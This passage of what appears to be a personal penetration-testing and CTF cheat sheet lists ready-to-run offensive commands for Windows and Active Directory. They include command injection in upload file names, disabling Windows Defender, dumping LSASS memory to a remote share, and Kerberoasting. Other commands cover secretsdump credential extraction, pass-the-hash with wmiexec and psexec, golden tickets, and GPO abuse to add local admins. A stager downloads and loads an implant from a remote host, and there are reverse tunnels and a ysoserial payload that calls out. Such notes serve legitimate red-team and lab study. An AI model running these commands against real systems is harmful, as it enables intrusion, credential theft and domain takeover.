https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html 1596 | $ https://owasp.org/www-community/attacks/SQL_Injection 1597 | $ https://portswigger.net/web-security/sql-injection 1598 | 1599 | => Sensitive Information 1600 | $ https://cwe.mitre.org/data/definitions/200.html 1601 | $ https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure 1602 | $ https://cwe.mitre.org/data/definitions/359.html 1603 | $ https://cyberintelligencehouse.com/exposure/disclosure-of-sensitive-information-and-exposure-enables-phishing 1604 | $ https://portswigger.net/web-security/information-disclosure 1605 | 1606 | => Zip Password 1607 | $ https://github.com/jingleyang/security_ctf/blob/master/hacking-lab.com/5020%20Password%20protected%20ZIP%20Writeup.md 1608 | 1609 | => Local File Inclusion (LFI) 1610 | $ https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion 1611 | $ https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/ 1612 | $ https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/ 1613 | 1614 | => Source Code Disclosure 1615 | $ https://portswigger.net/kb/issues/006000b0_source-code-disclosure 1616 | $ https://www.acunetix.com/blog/articles/source-code-disclosure-dangerous/ 1617 | ``` 1618 | 1619 | ### File Upload 1620 | 1621 | ```bash 1622 | # RCE in Filename 1623 | file$(whoami).jpg 1624 | file`whoami`.jpg 1625 | file;sleep 30;.jpg 1626 | 1627 | # References 1628 | https://www.onsecurity.io/blog/file-upload-checklist/ 1629 | https://book.hacktricks.xyz/pentesting-web/file-upload 1630 | ``` 1631 | 1632 | ### Static Binaries (Linux) 1633 | 1634 | ```bash 1635 | 1636 | ``` 1637 | 1638 | ### PowerShell Commands 1639 | 1640 | ```powershell 1641 | => Show Process 1642 | $ ps 1643 | $ ps | findstr "something" 1644 | 1645 | => Kill Process 1646 | $ stop-process -id 500 -force 1647 | 1648 | => Wget 1649 | $ wget 10.10.10.10/output.txt -outfile output.txt 1650 | 1651 | => Find file (recursive) 1652 | $ Get-ChildItem -Path C:\ -Filter ntds.dit -Recurse -ErrorAction SilentlyContinue -Force 1653 | 1654 | => Search content recursively 1655 | $ Get-ChildItem -Include "*.*" -recurse | Select-String -pattern "flag" | group path | select name 1656 | $ Get-ChildItem -Include "*.*" -recurse | Select-String -pattern "password" | group path | select name 1657 | 1658 | => Search Content 1659 | $ (Get-ChildItem C:\Users).Count 1660 | 1661 | => Disable Windows Defender 1662 | $ Set-MpPreference -DisableRealtimeMonitoring $true 1663 | 1664 | => Get Local/Remote Port 1665 | ((Get-NetTCPConnection -State Listen | select -ExpandProperty LocalPort) -join [char]44) 1666 | ((Get-NetTCPConnection -State Established | select -ExpandProperty RemotePort |Sort-Object -Unique) -join [char]44) 1667 | 1668 | => Get SMBShare 1669 | ((Get-SMBShare | select -ExpandProperty Name) -join [char]44) 1670 | 1671 | => Get IPV4 Address 1672 | (Get-NetIPAddress -AddressFamily IPv4).IPAddress 1673 | 1674 | => Read /etc/hosts (Remove # - Comments) 1675 | (Get-Content C:\Windows\System32\drivers\etc\hosts | Where { $_ -notmatch [char]94+[char]35 }).Trim() 1676 | 1677 | => List commandline process 1678 | wmic process list full | findstr /I commandline | Sort-Object -Unique 1679 | wmic process list full | findstr /I commandline | Sort-Object -Unique | Select-String -Pattern "password" 1680 | $test=[char]117+[char]114+[char]108;wmic process list full | findstr /I commandline |Sort-Object -Unique | Select-String -Pattern $test 1681 | 1682 | => Exclude String 1683 | type text.txt | Select-String -Pattern "food|eat" -NotMatch 1684 | 1685 | => Base64 (Encode) 1686 | $Text = 'This is a secret and should be hidden' 1687 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 1688 | $EncodedText =[Convert]::ToBase64String($Bytes) 1689 | $EncodedText 1690 | 1691 | => Base64 (Encode - EXE) 1692 | $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\Administrator\Documents\mimikatz.exe')); 1693 | [IO.File]::WriteAllText('C:\Users\Administrator\Documents\encode.txt', $b64) 1694 | 1695 | => Reverse 1696 | $text2 = (cat 'C:\Windows\Tasks\output.txt') 1697 | -join $text2[-1..-$text2.Length] 1698 | @ 1699 | $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Windows\Tasks\mimikatz.exe')) 1700 | $text = $b64.ToCharArray() 1701 | [Array]::Reverse($text) 1702 | -join $text 1703 | 1704 | => Append File / Combine File 1705 | $ [string]::join("",((cat C:\Windows\Tasks\output.txt, C:\Windows\Tasks\output2.txt).Split("`n"))) > C:\Windows\Tasks\output3.txt 1706 | 1707 | => List Firewall Settings 1708 | netsh firewall show state 1709 | 1710 | => View lnk files information 1711 | $sh = New-Object -COM WScript.Shell 1712 | $targetPath = $sh.CreateShortcut('C:\Users\Public\Desktop\shortcut.lnk') 1713 | $targetPath 1714 | ``` 1715 | 1716 | ### Abusing Weak GPO Permissions 1717 | 1718 | ```bash 1719 | => Find Vulnerable GPO (Using PowerView) 1720 | $ Get-DomainObjectAcl -Identity "GPOName" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} 1721 | $ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 1722 | $ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name | ?{($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}} 1723 | 1724 | => Abuse Using SharpGPOAbuse 1725 | $ https://github.com/FSecureLABS/SharpGPOAbuse 1726 | $ .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author bank.local\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -e " --GPOName "Vulnerable GPO" 1727 | $ .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author bank.local\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators nik /add" --GPOName "Vulnerable GPO" 1728 | $ .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount nik --GPOName "Vulnerable GPO" 1729 | $ gpupdate /force 1730 | 1731 | => References 1732 | $ https://book.hacktricks.xyz/windows/active-directory-methodology/acl-persistence-abuse#abusing-weak-gpo-permissions 1733 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#exploit-group-policy-objects-gpo 1734 | ``` 1735 | 1736 | ### Active Directory Enumeration 1737 | 1738 | ```bash 1739 | => Find Group Membership 1740 | $ (Get-WmiObject -Class Win32_GroupUser | where-object {$_.PartComponent -match "SQLAadmin"} | %{[wmi]$_.GroupComponent}).Caption 1741 | 1742 | => Find Domain Controllers 1743 | $ [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain().DomainControllers.Name 1744 | 1745 | => List Domain Computer 1746 | $ Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn 1747 | $ (Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn).Count 1748 | 1749 | => References 1750 | $ https://mlcsec.com/active-directory-domain-enumeration-part-2/ 1751 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md 1752 | ``` 1753 | 1754 | ### Windows Commands 1755 | 1756 | ```bash 1757 | => Commands 1758 | $ cmdkey /list 1759 | 1760 | => taskkill 1761 | $ taskkil /F /PID 8071 1762 | 1763 | => sc 1764 | $ sc qc servicename 1765 | $ sc queryex servicename 1766 | $ sc stop serviceanme 1767 | $ sc start servicename 1768 | $ sc query servicename 1769 | 1770 | => Find File Recursive 1771 | $ dir *flag* /s /b 1772 | 1773 | => winrs 1774 | $ winrs.exe -r:WEB01APP hostname 1775 | 1776 | => Change Password User 1777 | $ net user Administrator Passw0rd@123! 1778 | 1779 | => Dump process or pid 1780 | $ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full 1781 | $ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] \\10.10.10.10\public\dump.bin full 1782 | 1783 | ``` 1784 | 1785 | ### Bloodhound 1786 | 1787 | ```code 1788 | => Donwloads/Install 1789 | $ sudo apt-get install bloodhound 1790 | 1791 | => Commands 1792 | $ ne04j console 1793 | $ neo4j 1794 | 1795 | => Notes 1796 | $ http://localhost:7474/ 1797 | $ neo4j:neo4j 1798 | 1799 | ``` 1800 | 1801 | ### Red Team References 1802 | 1803 | ```bash 1804 | => References 1805 | $ https://www.vincentyiu.com/red-team-tips 1806 | $ https://vysecurity.rocks/ 1807 | $ https://herrscher.info/index.php/2021/04/11/red-teaming-guide/ 1808 | $ http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html 1809 | $ https://www.exploit-db.com/docs/48282 1810 | $ https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/ 1811 | ``` 1812 | 1813 | ### Rubeus 1814 | ```bash 1815 | # Download 1816 | https://github.com/GhostPack/Rubeus 1817 | 1818 | # Commands 1819 | .\Rubeus.exe asreproast /format:hashcat /outfile:ou.txt 1820 | .\Rubeus.exe kerberoast /outfile:ou.txt 1821 | .\Rubeus.exe asktgs /ticket: /service:MSSQL\DC01.MEGACORP.LOCAL 1822 | .\Rubeus.exe hash /user:nik /domain:BANK /password:password 1823 | .\Rubeus dump 1824 | * [IO.File]::WriteAllBytes("C:\users\administrator\downloads\ticket.kirbi", [Convert]::FromBase64String("")) 1825 | * .\Rubeus.exe ptt /ticket:ticket.kirbi 1826 | * .\PsExec64.exe -accepteula \\bank.local -u nikk cmd 1827 | .\Rubeus.exe s4u /user:nk /rc4:238F7038FD4BBC3293D8E75566DF4D65 /impersonateuser:administrator /msdsspn:"MSSQL/DC01.BANK.LOCAL" /altservice:cifs,http,host,mssql,mssqlsvc,ldap,krbtgt /ptt 1828 | .\Rubeus.exe dump /nowrap 1829 | * [IO.File]::WriteAllBytes("C:\users\nik\downloads\cifs.kirbi", [Convert]::FromBase64String("")) 1830 | * ticketConverter.py cifs.kirbi cifs.ccache 1831 | ``` 1832 | 1833 | ### Covenant 1834 | 1835 | ```bash 1836 | # Dotnet Install/Download 1837 | https://dotnet.microsoft.com/download/dotnet/3.1 1838 | 1839 | # Commands 1840 | ImpersonateProcess 1776 1841 | ImpersonateProcess 1842 | PortScan 192.168.20.10 10-2000 1843 | 1844 | # Chisel 1845 | - shell C:\windows\tasks\chisel_windows.exe client 10.10.10.10:8000 R:1080:socks 1846 | * Edit /etc/proxychains4.conf => socks5 127.0.0.1 1080 1847 | 1848 | # Rubeus 1849 | - Rubeus kerberoast admin hashcat 1850 | - Rubeus klist 1851 | 1852 | # Import Powershell 1853 | - PowerShellImport 1854 | - Choose file 1855 | 1856 | # Powerview 1857 | - Powershell Get-DomainUser -TrustedToAuth 1858 | 1859 | # PowerMad 1860 | - Powershell Resolve-DNSName NoDNSRecord 1861 | - Powershell New-ADIDNSNode -Node * -Verbose 1862 | - Powershell grant-adidnspermission -node * -principal "Authenticated Users" -Access GenericAll -Verbose 1863 | 1864 | # Invoke-DNSUpdate 1865 | - Powershell Invoke-DNSupdate -DNSType A -DNSName * -DNSData 10.10.10.10 -Verbose 1866 | 1867 | # Inveigh 1868 | - Powershell Invoke-InveighRelay -ConsoleOutput -Y -StatusOutput N -Command "net user commandtest Passw0rd123! /add" -Attack Enumerate,Execute,Session 1869 | - Powershell Invoke-Inveigh -ConsoleOutput Y 1870 | - Powershell Stop-Inveigh 1871 | - Powwershell Invoke-Inveigh -FileOutput Y 1872 | 1873 | # Load Grunt (Load Assembly) 1874 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/grunt.exe') 1875 | $assem = [System.Reflection.Assembly]::Load($data) 1876 | [GruntStager.GruntStager]::Main("".Split()) 1877 | 1878 | # Impersonate 1879 | getsystem 1880 | 1881 | ``` 1882 | 1883 | ### PoshC2 1884 | 1885 | ```code 1886 | # Install 1887 | curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash 1888 | 1889 | # Commands (posh) 1890 | posh-project -n 1891 | posh-project -d 1892 | posh-config 1893 | posh-server <-- This will run the C2 server, which communicates with Implants and receives task output 1894 | posh <-- This will run the ImplantHandler, used to issue commands to the server and implants 1895 | posh-service <-- This will run the C2 server as a service instead of in the foreground 1896 | posh-stop-service <-- This will stop the service 1897 | posh-log <-- This will view the C2 log if the server is already running 1898 | posh -u aniq 1899 | 1900 | # Commands 1901 | 1902 | 1903 | # References 1904 | https://github.com/nettitude/PoshC2 1905 | https://poshc2.readthedocs.io/en/latest/ 1906 | https://github.com/zenosxx/PoshC2 1907 | ``` 1908 | 1909 | ### Adb 1910 | 1911 | ```bash 1912 | => Install 1913 | $ sudo apt-get install android-tools-adb android-tools-fastboot 1914 | 1915 | => Commands 1916 | $ adb devices 1917 | $ adb shell 1918 | $ adb -s localhost:5555 shell 1919 | ``` 1920 | 1921 | ### Pypykatz 1922 | 1923 | ```code 1924 | # Intall 1925 | pip3 install pypykatz 1926 | 1927 | # Commands 1928 | pypykatz lsa minidump lsass.dmp 1929 | pypykatz registry --sam sam system 1930 | ``` 1931 | 1932 | ### DomainPasswordSpray.ps1 1933 | 1934 | ```bash 1935 | # Command 1936 | 1937 | 1938 | # References 1939 | https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 1940 | ``` 1941 | 1942 | ### Httpx 1943 | 1944 | ```bash 1945 | # Install 1946 | GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx 1947 | ``` 1948 | 1949 | ### Stabilize 1950 | 1951 | ```bash 1952 | => Ways 1953 | $ script -qc /bin/bash /dev/null 1954 | $ python -m 'import pty;pty.spawn("/bin/bash"))' 1955 | $ python3 -m 'import pty;pty.spawn("/bin/bash"))' 1956 | $ Ctrl + z @ stty -raw echo;fg 1957 | ``` 1958 | 1959 | ### Port Forwarding & Tunneling 1960 | 1961 | ```bash 1962 | # Socat 1963 | socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22 1964 | socat tcp-listen:8080,reuseaddr,fork tcp:localhost:8080 1965 | 1966 | # Meterpreter 1967 | portfwd add -l -p -r 1968 | 1969 | # Chisel 1970 | ## Client Machine 1971 | ./chisel client 10.66.67.154:8000 R:25:127.0.0.1:25 1972 | ./chisel client 10.66.67.130:8000 R:8080:127.0.0.1:8080 1973 | ./chisel client 10.10.10.10:8001 R:1080:socks 1974 | 1975 | ## Attacker Machine 1976 | ./chisel server -p 8000 --reverse 1977 | 1978 | # References 1979 | -> https://book.hacktricks.xyz/tunneling-and-port-forwarding 1980 | ``` 1981 | 1982 | ### Crackmapexec 1983 | 1984 | ```code 1985 | => Docker install 1986 | $ docker pull byt3bl33d3r/crackmapexec 1987 | $ docker run -it --entrypoint=/bin/sh --name crackmapexec byt3bl33d3r/crackmapexec 1988 | $ docker start crackmapexec 1989 | $ docker exec -it crackmapexec sh 1990 | $ docker cp /var/lib/docker/volumes/data/_data/EMPLOYEE.FDB firebird:/firebird/data/EMPLOYEE2.FDB 1991 | 1992 | => Commands 1993 | $ crackmapexec smb --gen-relay-list targets.txt 10.10.10.0/24 1994 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -X whoami --amsi-bypass /tmp/amsiibypass 1995 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -x whoami 1996 | $ crackmapexec smb 10.10.10.10 -u 'nik' -H hash_uniq.txt 1997 | ``` 1998 | 1999 | ### Impacket Tools 2000 | 2001 | ```bash 2002 | => GetNPUsers.py (AsrepRoasting) 2003 | $ GetNPUsers.py -dc-ip 10.10.10.10 -request 'bank.local/' -no-pass -usersfile user.txt -format hashcat 2004 | mode 18200 2005 | 2006 | => GetUserSPNs.py (Kerberoasting) 2007 | $ GetUserSPNs.py bank.local/nik:'Password@123!' -dc-ip 10.10.10.10 -request -outputfile output.txt 2008 | 2009 | => GetADUsers.py 2010 | $ GetADUsers.py -all bank.local/nik:'Password@123!'-dc-ip 10.10.10.10 2011 | 2012 | => secretsdump.py 2013 | $ export KRB5CCNAME=Administrator.ccache 2014 | $ secretsdump.py -k DC01.bank.local -just-dc 2015 | $ secretsdump.py -just-dc bank.local/nik:'Password@123!'@10.10.10.10 2016 | $ secretsdump.py -ntds ntds.dit -system system local 2017 | $ secretsdump.py -ntds ntds.dit -system system local -history 2018 | $ secretsdump.py -sam SAM -system SYSTEM local 2019 | $ secretsdump.py -ntds ntds.dit -system system.hive local -outputfile dump.txt 2020 | $ secretsdump.py bank.local/Administrator@BANK -target-ip 10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460 2021 | 2022 | => getST.py 2023 | $ getST.py -spn MSSQL/DC01.BANK.LOCAL 'BANK.LOCAL/nik:password' -impersonate Administrator -dc-ip 10.10.10.10 2024 | $ getST.py -spn MSSQL/DC01.BANK.LOCAL 'BANK.LOCAL/nik' -impersonate Administrator -dc-ip 10.10.10.10 -hashes ':2182eed0101516d0ax06b98c579x65e6' 2025 | 2026 | => getTGT.py 2027 | $ getTGT.py -dc-ip 10.10.10.10 bank.local/nik:'Passw0rd@123!' 2028 | 2029 | => wmiexec.py 2030 | $ export KRB5CCNAME=Administrator.ccache; 2031 | $ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0405e42853c0f2cb0454964601f27bae administrator@10.10.10.10 2032 | $ wmiexec.py -hashes :0405e42853c0f2cb0454964601f27bae administrator@10.10.10.10 2033 | $ wmiexec.py bank.local/Administrator@DC.bank.local -k -no-pass 2034 | 2035 | => psexec.py 2036 | $ export KRB5CCNAME=Administrator.ccache 2037 | $ psexec.py BANK\Administrator@10.10.10.10 -hashes 'aad3b435b51404eeaad3b435b51404ee:2182eed0101516d0ax06b98c579x65e6' 2038 | $ psexec.py bank.local/nik:'Password@123'@10.10.10.10 2039 | $ psexec.py -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -no-pass -k bank.local/Administrator@DC.bank.local 2040 | $ psexec.py bank.local/Administrator@DC.bank.local -k -no-pass 2041 | 2042 | => smbclient.py 2043 | $ export KRB5CCNAME=Administrator.ccache; 2044 | $ smbclient.py bank.local/nik:'Password@123'@10.10.10.10 2045 | $ smbclient.py bank.local/administrator@dc.bank.local -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -no-pass -k 2046 | $ smbclient.py bank.local/administrator@dc.bank.local -no-pass -k 2047 | $ shares 2048 | $ ls 2049 | $ cd .. 2050 | $ cat flag.txt 2051 | 2052 | => mssqlclient.py 2053 | $ mssqlclient.py -windows-auth bank.local/aniq:'Password@123'@10.10.10.10 2054 | 2055 | => ticketConverter.py 2056 | $ ticketConverter.py cifs.kirbi cifs.ccache 2057 | 2058 | => ticketer.py (Golden Tick) 2059 | $ ticketer.py -domain bank.local -nthash -dc-ip 10.10.10.10 -domain-sid 2060 | $ ticketer.py -domain bank.local -nthash 4e48ce125611add31a32cd79e529964b -dc-ip 10.10.10.10 -domain-sid S-1-5-21-3750359090-2939318659-876128439 lolol 2061 | 2062 | => lookupsid.py 2063 | $ lookupsid.py Administrator:password@10.10.10.10 2064 | $ lookupsid.py bank.local/Administrator@10.10.11.108 -hashes ':32db622ed9c00dd1039d8288b0407460' 2065 | 2066 | => References 2067 | $ https://www.hackingarticles.in/abusing-kerberos-using-impacket/ 2068 | ``` 2069 | 2070 | ### Git-LFS 2071 | 2072 | ```code 2073 | # Download 2074 | wget https://github.com/git-lfs/git-lfs/releases/download/v2.9.0/git-lfs-linux-amd64-v2.9.0.tar.gz 2075 | 2076 | # Steps 2077 | tar -xf git-lfs-linux-amd64-v2.9.0.tar.gz 2078 | chmod +x install.sh 2079 | sudo ./install.sh 2080 | 2081 | # Inside directory repo 2082 | git lfs install 2083 | git lfs track "*.m" 2084 | git add .gitattributes 2085 | git commit -am "Done" 2086 | git push origin master 2087 | ``` 2088 | 2089 | ### Git Commands 2090 | 2091 | ```bash 2092 | => Commands 2093 | git status 2094 | git pull 2095 | git add . 2096 | git commit -m "Update" 2097 | git push 2098 | git stash 2099 | git stash list 2100 | git stash show -p "stash@{0}" 2101 | git stash apply "stash@{0}" 2102 | ``` 2103 | 2104 | ### Objection 2105 | 2106 | ```bash 2107 | # Install 2108 | pip3 install -U objection 2109 | 2110 | # Commands 2111 | - objection patchapk --source base.apk 2112 | - objection patchapk --source base.apk -a arm64 2113 | - adb install base.objection.apk 2114 | - objection -g com.app.yes explore 2115 | - objection explore (Make sure to open the application first in our mobile phone before run) 2116 | 2117 | #==Android== 2118 | * android sslpinning disable 2119 | 2120 | #==Ios== 2121 | * ios sslpinning disable 2122 | 2123 | # References 2124 | - https://gowthamr1.medium.com/android-ssl-pinning-bypass-using-objection-and-frida-scripts-f8199571e7d8 2125 | - https://github.com/sensepost/objection/tree/master/objection/console/helpfiles 2126 | - https://rehex.ninja/posts/frida-cheatsheet/ 2127 | - https://cheatography.com/hnd/cheat-sheets/objection-ios/ 2128 | ``` 2129 | 2130 | ### Ysoserial 2131 | 2132 | ```bash 2133 | # Download 2134 | https://github.com/pwntester/ysoserial.net 2135 | 2136 | # Commands 2137 | ##==Json.Net== 2138 | .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell curl http://10.10.10.10/" 2139 | 2140 | ``` 2141 | 2142 | ### Obsidian (Tricks) 2143 | 2144 | ```code 2145 | # GitHub (Example -> https://github.com/H0j3n/EzpzCTF) 2146 | - This is how im manage to upload files and not worry about the location (If there is any other ways let me know) 2147 | - Make one folder name as src in root path (git repo) 2148 | - Then you copy the url path to that image 2149 | - Example : https://github.com/H0j3n/EzpzCTF/tree/main/src/ 2150 | - This a one liner to do that 2151 | - Make sure to change the url to yours. 2152 | - It receive url encode thats why you will see %20 in the url which equivalent to spaces. 2153 | 2154 | ======(One Liner)===== 2155 | cat README.md | sed 's/\!\[\[Pasted image /\!\[\]\(https\:\/\/github.com\/H0j3n\/EzpzCTF\/blob\/main\/src\/Pasted%20image%20/g' | sed 's/.png\]\]/.png\)/g' > test.md;mv test.md README.md 2156 | ====================== 2157 | ``` 2158 | 2159 | ### Python Scripter (Burp) 2160 | 2161 | ```bash 2162 | # Install 2163 | - https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52583 2164 | 2165 | # References 2166 | - https://gist.github.com/lanmaster53/3d868369d0ba5144b215921d4e11b052 2167 | - https://github.com/PortSwigger/python-scripter 2168 | ``` 2169 | 2170 | ### Burpsuite 2171 | 2172 | ```bash 2173 | => Extensions List 2174 | $ https://github.com/snoopysecurity/awesome-burp-extensions#xxe 2175 | $ https://portswigger.net/solutions/penetration-testing/penetration-testing-tools 2176 | ``` 2177 | 2178 | ### CTI Lexicon 2179 | 2180 | ``` 2181 | Link : https://github.com/BushidoUK/CTI-Lexicon/blob/main/Lexicon.md 2182 | 2183 | # About 2184 | - Guide to some of the jargon and acronyms liberally used in CTI. You will sometimes find these peppered in reports with no explanation offered or in the Tweets by professionals from Infosec Twitter 2185 | ``` 2186 | 2187 | ### Waifu2x (Image Super-Resolution) 2188 | 2189 | ``` 2190 | # References 2191 | - https://github.com/nagadomi/waifu2x 2192 | - http://waifu2x.udp.jp/ 2193 | ``` 2194 | 2195 | ### Responder 2196 | 2197 | ```bash 2198 | => Download 2199 | $ https://github.com/SpiderLabs/Responder 2200 | 2201 | => Configuration Location 2202 | $ /etc/responder/Responder.conf 2203 | 2204 | => Commands 2205 | $ sudo responder -I tun0 -rdwv 2206 | ``` 2207 | 2208 | ### gMSADumper.py 2209 | 2210 | ```bash 2211 | => Download 2212 | $ https://github.com/micahvandeusen/gMSADumper 2213 | 2214 | => Commands 2215 | $ python3 gMSADumper.py -u 'nik' -p 'Passw0rd@123!'' -d bank.local 2216 | 2217 | => References 2218 | $ https://docs.microsoft.com/en-us/windows/win32/adschema/a-msds-managedpasswordid 2219 | $ https://github.com/n00py/LAPSDumper/ 2220 | $ https://github.com/micahvandeusen/gMSADumper 2221 | ``` 2222 | 2223 | ### Krbrelayx - Unconstrained delegation abuse toolkit 2224 | 2225 | ```bash 2226 | => Download 2227 | $ https://github.com/dirkjanm/krbrelayx 2228 | 2229 | => printerbug.py 2230 | $ Simple tool to trigger SpoolService bug via RPC backconnect 2231 | $ 2232 | 2233 | => addspn.py 2234 | $ Add an SPN to a user/computer account 2235 | $ 2236 | 2237 | => dnstool.py 2238 | $ Query/modify DNS records for Active Directory integrated DNS via LDAP 2239 | $ .\dnstool.py -u BANK\\nik -p 'Passw0rd@123!' -r web01.bank.local -d 10.10.10.12 --action add 19.10.10.10 2240 | 2241 | => krbrelayx.py 2242 | $ Kerberos "relay" tool. Abuses accounts with unconstrained delegation to pwn 2243 | things. 2244 | 2245 | => References 2246 | https://github.com/dirkjanm/krbrelayx 2247 | ``` 2248 | 2249 | ### Vboxmanage.exe 2250 | 2251 | ```bash 2252 | # Commands 2253 | .\VboxMange.exe -nologo guestcontrol "Docker" run -exe "/bin/bash" --username "nik" --password "password123" --wait-stdout -- bash -c '/usr/bin/echo "oassword123" | sudo -S cat /etc/passwd 2>/dev/null' 2254 | ``` 2255 | 2256 | ### Powerview.ps1 2257 | 2258 | ```code 2259 | => Download 2260 | $ git clone https://github.com/PowerShellMafia/PowerSploit.git 2261 | 2262 | => Commands 2263 | $ Get-DomainComputer 2264 | $ Get-DomainComputer -properties name 2265 | $ Get-DomainComputer -Unconstrained -Properties useraccountcontrol,dnshostname | fl 2266 | $ Get-DomainTrustMapping -Verbose 2267 | $ Get-DomainTrust 2268 | $ Get-NetForest 2269 | $ Get-NetForestDomain 2270 | $ Get-NetForestTrust 2271 | $ (get-domaincomputer -domain bank.local).dnshostname 2272 | $ Get-NetLoggedon 2273 | $ Get-NetProcess 2274 | $ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 2275 | $ Get-DomainObjectAcl -Identity "GPOName" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} 2276 | $ Invoke-ShareFinder 2277 | $ Invoke-UserHunter 2278 | 2279 | => References 2280 | $ https://gist.github.com/macostag/44591910288d9cc8a1ed6ea35ac4f30f 2281 | $ https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 2282 | $ https://www.slideshare.net/harmj0y/i-have-the-powerview 2283 | ``` 2284 | 2285 | ### Generate client SSL Certificate 2286 | 2287 | ```bash 2288 | # Download server side certificate (Browser) 2289 | - Click on the Lock icon in the url row > Show Connection Details > More Information > View Certificate > Download PEM (cert) > Save it as .crt 2290 | 2291 | # Check 2292 | openssl pkey -in ca.key -pubout | md5sum 2293 | openssl x509 -in lacasadepapel-htb.crt -pubkey -noout | md5sum 2294 | 2295 | - This will give the same md5sum output which is => 71e2b2ca7b610c24d132e3e4c06daf0c 2296 | 2297 | # Generate private key for SSL client 2298 | openssl genrsa -out client.key 4096 2299 | 2300 | # Generate cert request 2301 | openssl req -new -key client.key -out client.req 2302 | 2303 | # Issue client certificate 2304 | openssl x509 -req -in client.req -CA lacasadepapel-htb.crt -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer 2305 | 2306 | # Convert to pkcs#12 format (Browser) 2307 | openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12 2308 | 2309 | # Clean (optional) 2310 | rm client.key client.cer client.req 2311 | 2312 | # References 2313 | https://www.makethenmakeinstall.com/2014/05/ssl-client-authentication-step-by-step/ 2314 | ``` 2315 | 2316 | ### Active Directory 2317 | 2318 | ```bash 2319 | # Commands 2320 | net user /domain 2321 | net group /domain 2322 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 2323 | 2324 | # LDAP 2325 | ======script(domain)====== 2326 | $domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 2327 | $Pdc = ($domainObject.PdcRoleOwner).Name 2328 | $searchString = "LDAP://" 2329 | $searchString += $Pdc + "/" 2330 | $Name = "DC=$($domainObject.Name.Replace('.', ',DC='))" 2331 | $searchString += $Name 2332 | $search = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchString) 2333 | $objectDomain = New-Object System.DirectoryServices.DirectoryEntry 2334 | $search.SearchRoot = $objectDomain 2335 | $search.filter="samAccountType=805306368" 2336 | $res = $search.FindAll() | Sort-Object path 2337 | ================== 2338 | 2339 | ======script(Local)===== 2340 | $Searcher = New-Object DirectoryServices.DirectorySearcher 2341 | $Searcher.SearchRoot = 'LDAP://CN=Users,DC=bank,DC=local' 2342 | $Searcher.Filter = '(&(objectCategory=person))' 2343 | $res = $Searcher.FindAll() | Sort-Object path 2344 | =================== 2345 | 2346 | # LDAP References 2347 | https://gist.github.com/Erreinion/76660c012ad05ab90182 2348 | 2349 | # .Net Method 2350 | =====ADForestInfo==== 2351 | $ADForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 2352 | $ADForestInfo.Name 2353 | $ADForestInfo.Sites 2354 | $ADForestInfo.Domains 2355 | $ADForestInfo.GlobalCatalogs 2356 | $ADForestInfo.ApplicationPartitions 2357 | $ADForestInfo.ForestMode 2358 | $ADForestInfo.RootDomain 2359 | $ADForestInfo.Schema 2360 | $ADForestInfo.SchemaRoleOwner 2361 | $ADForestInfo.NamingRoleOwner 2362 | OR 2363 | 